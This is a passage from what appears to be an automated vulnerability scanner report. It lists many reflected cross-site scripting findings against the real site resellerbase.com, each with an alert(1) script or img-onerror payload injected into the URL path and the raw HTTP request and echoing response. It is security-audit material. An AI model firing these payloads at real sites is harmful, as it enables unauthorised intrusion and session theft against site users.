GET /tag/web+cam32a29<img%20src%3da%20onerror%3dalert(1)>5a6694fcd02dcc332?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/web+cam
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: web c
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : web cam32a29<img src=a onerror=alert(1)>5a6694fcd02dcc332]</td>
...[SNIP]...

2.4670. http://www.resellerbase.com/tag/web+cam [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/web+cam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 951dc</title><img%20src%3da%20onerror%3dalert(1)>9ea6fb7e0c2 was submitted in the REST URL parameter 2. This input was echoed as 951dc</title><img src=a onerror=alert(1)>9ea6fb7e0c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/web+cam951dc</title><img%20src%3da%20onerror%3dalert(1)>9ea6fb7e0c2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: web cam951dc</title><img src=a onerror=alert(1)>9ea6fb7e0c2</title>
...[SNIP]...

2.4671. http://www.resellerbase.com/tag/web+cam+chat [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/web+cam+chat

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f7be8<script>alert(1)</script>96f59d27fc2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagf7be8<script>alert(1)</script>96f59d27fc2/web+cam+chat HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/rivcash-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagf7be8<script>alert(1)</script>96f59d27fc2/web+cam+chat was not found on this server.</p>
...[SNIP]...

2.4672. http://www.resellerbase.com/tag/web+hosting [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/web+hosting

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ca930<script>alert(1)</script>00857bf835714eecb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tagca930<script>alert(1)</script>00857bf835714eecb/web+hosting?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/web+hosting
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagca930<script>alert(1)</script>00857bf835714eecb/web+hosting?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4673. http://www.resellerbase.com/tag/web+hosting [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/web+hosting

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 276b4<script>alert(1)</script>3811c127324 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag276b4<script>alert(1)</script>3811c127324/web+hosting HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:28:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag276b4<script>alert(1)</script>3811c127324/web+hosting was not found on this server.</p>
...[SNIP]...

2.4674. http://www.resellerbase.com/tag/web+hosting [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/web+hosting

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 503d7<img%20src%3da%20onerror%3dalert(1)>cffd6ef0d6b46ae6f was submitted in the REST URL parameter 2. This input was echoed as 503d7<img src=a onerror=alert(1)>cffd6ef0d6b46ae6f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/web+hosting503d7<img%20src%3da%20onerror%3dalert(1)>cffd6ef0d6b46ae6f?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/web+hosting
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: web h
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : web hosting503d7<img src=a onerror=alert(1)>cffd6ef0d6b46ae6f]</td>
...[SNIP]...

2.4675. http://www.resellerbase.com/tag/web+hosting [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/web+hosting

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload f73c7</title><img%20src%3da%20onerror%3dalert(1)>409e2676c765ae41 was submitted in the REST URL parameter 2. This input was echoed as f73c7</title><img src=a onerror=alert(1)>409e2676c765ae41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/web+hostingf73c7</title><img%20src%3da%20onerror%3dalert(1)>409e2676c765ae41?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/web+hosting
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: web hostingf73c7</title><img src=a onerror=alert(1)>409e2676c765ae41</title>
...[SNIP]...

2.4676. http://www.resellerbase.com/tag/web+hosting [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/web+hosting

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3c199<img%20src%3da%20onerror%3dalert(1)>3a053d3d0c3 was submitted in the REST URL parameter 2. This input was echoed as 3c199<img src=a onerror=alert(1)>3a053d3d0c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/web+hosting3c199<img%20src%3da%20onerror%3dalert(1)>3a053d3d0c3 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:28:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: web h
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : web hosting3c199<img src=a onerror=alert(1)>3a053d3d0c3]</td>
...[SNIP]...

2.4677. http://www.resellerbase.com/tag/web+hosting [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/web+hosting

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 50913</title><img%20src%3da%20onerror%3dalert(1)>00b8adbbecd was submitted in the REST URL parameter 2. This input was echoed as 50913</title><img src=a onerror=alert(1)>00b8adbbecd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/web+hosting50913</title><img%20src%3da%20onerror%3dalert(1)>00b8adbbecd HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:29:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: web hosting50913</title><img src=a onerror=alert(1)>00b8adbbecd</title>
...[SNIP]...

2.4678. http://www.resellerbase.com/tag/web+statistics [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/web+statistics

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9bd38<script>alert(1)</script>a2ef342af42 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag9bd38<script>alert(1)</script>a2ef342af42/web+statistics HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag9bd38<script>alert(1)</script>a2ef342af42/web+statistics was not found on this server.</p>
...[SNIP]...

2.4679. http://www.resellerbase.com/tag/webcam [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/webcam

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 54183<script>alert(1)</script>cdadbb5b81d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag54183<script>alert(1)</script>cdadbb5b81d/webcam HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:57:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag54183<script>alert(1)</script>cdadbb5b81d/webcam was not found on this server.</p>
...[SNIP]...

2.4680. http://www.resellerbase.com/tag/webcam [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/webcam

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1f956<script>alert(1)</script>5888b2c2f519c1fd1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag1f956<script>alert(1)</script>5888b2c2f519c1fd1/webcam?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/webcam
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag1f956<script>alert(1)</script>5888b2c2f519c1fd1/webcam?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4681. http://www.resellerbase.com/tag/webcam [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/webcam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 74a2a</title><img%20src%3da%20onerror%3dalert(1)>31a8c2c9e54d8318e was submitted in the REST URL parameter 2. This input was echoed as 74a2a</title><img src=a onerror=alert(1)>31a8c2c9e54d8318e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/webcam74a2a</title><img%20src%3da%20onerror%3dalert(1)>31a8c2c9e54d8318e?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/webcam
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: webcam74a2a</title><img src=a onerror=alert(1)>31a8c2c9e54d8318e</title>
...[SNIP]...

2.4682. http://www.resellerbase.com/tag/webcam [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/webcam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e9ca0<img%20src%3da%20onerror%3dalert(1)>074a7c75d7515865e was submitted in the REST URL parameter 2. This input was echoed as e9ca0<img src=a onerror=alert(1)>074a7c75d7515865e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/webcame9ca0<img%20src%3da%20onerror%3dalert(1)>074a7c75d7515865e?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/webcam
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: webca
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : webcame9ca0<img src=a onerror=alert(1)>074a7c75d7515865e]</td>
...[SNIP]...

2.4683. http://www.resellerbase.com/tag/webcam [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/webcam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7773c<img%20src%3da%20onerror%3dalert(1)>4be10d12c5f was submitted in the REST URL parameter 2. This input was echoed as 7773c<img src=a onerror=alert(1)>4be10d12c5f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/webcam7773c<img%20src%3da%20onerror%3dalert(1)>4be10d12c5f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: webca
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : webcam7773c<img src=a onerror=alert(1)>4be10d12c5f]</td>
...[SNIP]...

2.4684. http://www.resellerbase.com/tag/webcam [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/webcam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 8e4fb</title><img%20src%3da%20onerror%3dalert(1)>b90a1357dcb was submitted in the REST URL parameter 2. This input was echoed as 8e4fb</title><img src=a onerror=alert(1)>b90a1357dcb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/webcam8e4fb</title><img%20src%3da%20onerror%3dalert(1)>b90a1357dcb HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: webcam8e4fb</title><img src=a onerror=alert(1)>b90a1357dcb</title>
...[SNIP]...

2.4685. http://www.resellerbase.com/tag/webhosting [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/webhosting

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 49671<script>alert(1)</script>4ecee10a930 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag49671<script>alert(1)</script>4ecee10a930/webhosting HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag49671<script>alert(1)</script>4ecee10a930/webhosting was not found on this server.</p>
...[SNIP]...

2.4686. http://www.resellerbase.com/tag/website+monitoring [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/website+monitoring

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d1167<script>alert(1)</script>57ecdccb081 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagd1167<script>alert(1)</script>57ecdccb081/website+monitoring HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagd1167<script>alert(1)</script>57ecdccb081/website+monitoring was not found on this server.</p>
...[SNIP]...

2.4687. http://www.resellerbase.com/tag/white+label [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/white+label

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 98efb<script>alert(1)</script>a3113a118e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

